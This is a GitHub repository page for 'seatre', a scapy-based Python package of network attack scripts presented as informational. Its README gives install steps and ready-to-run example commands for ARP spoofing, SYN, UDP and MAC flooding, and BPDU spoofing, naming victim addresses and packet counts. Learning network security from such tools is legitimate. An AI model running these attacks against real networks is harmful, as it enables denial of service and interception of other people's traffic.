Skip to content
/ seatre Public

A Collection of Scripts That Implement Different Network Attacks. For Informational Purposes Only

License

Notifications You must be signed in to change notification settings

nadzyah/seatre

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

49 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

seatre

Python Linux GitHub license

A collection of scripts that implement different network attacks. For informational purposes only.

Any contributor to this project doesn't take any responsibility for illegal usage of any script from this project.

See the article about how to use it here.

Installation and Usage

The tested environment:

  • Python v3.10
  • Ubuntu 22.04 LTS

Make sure that python3-scapy is installed on your system: sudo apt-get install python3-scapy

You can either run app.py from a checkout of the code, or install it like any other python project. Keep in mind that a lot of scripts here can be executed only with the root privileges, so you need to run it with sudo.

$ sudo pip3 install seatre
$ sudo seatre
usage: seatre [-h] [--debug] {attack} ...

To enter the debug mode, use the --debug option after the seatre command.

To get the attack description in the terminal, enter seatre <attack> --desc

Implemented Attacks

The following commands include the --debug option, which is not required to execute an attack.

ARP Spoofing

Example usage:

$ sudo seatre --debug arpspoof -i wlp2s0 -m aa:aa:aa:aa:aa:aa -gm BB-BB-BB-BB-BB-BB -gip 192.168.0.1 -vm cc:cc:cc:cc:cc:cc -vip 192.168.0.108

where:

  • wlp2s0 — your network interface
  • aa:aa:aa:aa:aa:aa — the interface MAC-address (can be written as AA:AA:AA:AA:AA:AA, AA-AA-AA-AA-AA-AA and aa-aa-aa-aa-aa-aa)
  • bb:bb:bb:bb:bb:bb — the gateway's MAC-address
  • 192.168.0.1 — the gateway's IP-address
  • cc:cc:cc:cc:cc:cc — the victim's MAC-address
  • 192.168.0.108 — the victim's IP-address

Run sudo seatre arpspoof --help to get more information.

SYN Flood

Example usage:

$ sudo seatre --debug synflood -d 172.17.17.10 -p 443 -c 1000

where:

  • 172.17.17.10 — server's IP-address
  • 443 — server's port
  • 1000 — the number of packets to be sent

Run sudo seatre synflood --help to get more information.

UDP Flood

Example usage:

$ sudo seatre --debug udpflood -d 172.17.17.10 -p 53 -c 1000

where:

  • 172.17.17.10 — server's IP-address
  • 53 — server's port
  • 1000 — the number of packets to be sent

Run sudo seatre udpflood --help to get more information.

MAC Flood

Example usage:

$ sudo seatre --debug macflood -i wlp2s0 -vm "aa:aa:aa:aa:aa:aa" -c 100000

where:

  • wlp2s0 — your network interface
  • aa:aa:aa:aa:aa:aa — the victim's MAC-address (can be written as AA:AA:AA:AA:AA:AA, AA-AA-AA-AA-AA-AA and aa-aa-aa-aa-aa-aa)
  • 100000 — the number of packets to be sent

Run sudo seatre macflood --help to get more information.

BPDU Spoofing

Example usage:

sudo seatre --debug stpspoof -i wlp2s0 -smac "aa:aa:aa:aa:aa:aa" -dmac "bb:bb:bb:bb:bb:bb" -p 4096
  • wlp2s0 — your network interface
  • aa:aa:aa:aa:aa:aa — your MAC-address
  • bb:bb:bb:bb:bb:bb — victim switch's MAC-address
  • 4096 — priority for choosing the root switch (the lower the number, the higher the priority, so make sure it's low enough to become the root). Must be divisible by 4096

About

A Collection of Scripts That Implement Different Network Attacks. For Informational Purposes Only

Topics

Resources

License

Stars

Watchers

Forks

Packages

No packages published